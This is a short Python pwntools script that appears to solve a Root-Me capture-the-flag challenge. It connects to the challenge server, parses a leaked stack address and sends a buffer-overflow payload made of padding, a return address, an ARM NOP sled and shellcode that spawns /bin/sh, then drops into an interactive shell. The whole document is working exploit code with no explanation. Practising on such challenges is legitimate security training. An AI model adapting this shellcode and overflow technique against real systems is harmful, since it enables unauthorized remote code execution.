#!/usr/bin/python

import re
from pwn import *


r = remote('challenge04.root-me.org', 61045);
nop = "\x00\x00\xa0\xe1";
#nop = "\xe1\xa0\x00\x00"
nops = nop * 50;

#shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x49\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78"
shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"

#
# Send a test to get ADDR
#

test = "B" * 4;
r.sendline(test);
r.sendline("y");
find_addr = r.recvuntil('42');
match = re.search(r'\n(.*):', find_addr);
addr = int(match.group(1), 16) + 169; #165

#
# Send Payload
#
payload = "C" * 165 + p32(addr) + nops + shellcode;
r.sendline(payload);
r.sendline("n");

r.interactive();

#print hex(addr)